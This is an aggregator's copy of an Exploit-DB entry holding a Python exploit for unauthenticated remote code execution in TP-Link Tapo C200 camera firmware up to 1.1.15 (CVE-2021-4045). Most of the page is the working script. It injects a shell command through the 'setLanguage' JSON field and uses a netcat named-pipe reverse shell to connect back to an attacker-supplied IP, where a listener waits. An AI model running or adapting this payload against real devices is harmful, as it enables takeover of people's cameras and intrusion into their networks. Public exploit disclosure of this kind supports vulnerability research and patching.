11
[webapps] TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
source link: https://www.exploit-db.com/exploits/51017
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
# Date: 02/11/2022
# Exploit Author: hacefresko
# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/
# Version: 1.1.15 and below
# Tested on: 1.1.11, 1.1.14 and 1.1.15
# CVE : CVE-2021-4045
# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce
import requests, urllib3, sys, threading, os
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
PORT = 1337
REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)
if len(sys.argv) < 3:
print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")
exit()
victim = sys.argv[1]
attacker = sys.argv[2]
print("[+] Listening on %d" % PORT)
t = threading.Thread(target=os.system, args=(NC_COMMAND,))
t.start()
print("[+] Serving payload to %s\n" % victim)
url = "https://" + victim + ":443/"
json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
requests.post(url, json=json, verify=False)
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK